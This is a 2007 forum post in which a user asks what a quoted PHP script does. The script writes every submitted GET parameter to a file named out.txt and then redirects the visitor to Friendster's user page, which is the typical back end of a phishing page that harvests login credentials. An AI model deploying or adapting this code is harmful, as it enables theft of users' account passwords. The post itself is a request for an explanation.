anyone knows wha this php script means????

anyone knows wha this php script means????

am 20.09.2007 19:11:25 von pinoyclan

header("Location: http://www.friendster.com/index.cfm?fuseaction=user");
$handle = fopen("out.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


this link of the code is here, pls tell me what this means and the
function of this .php file. thank you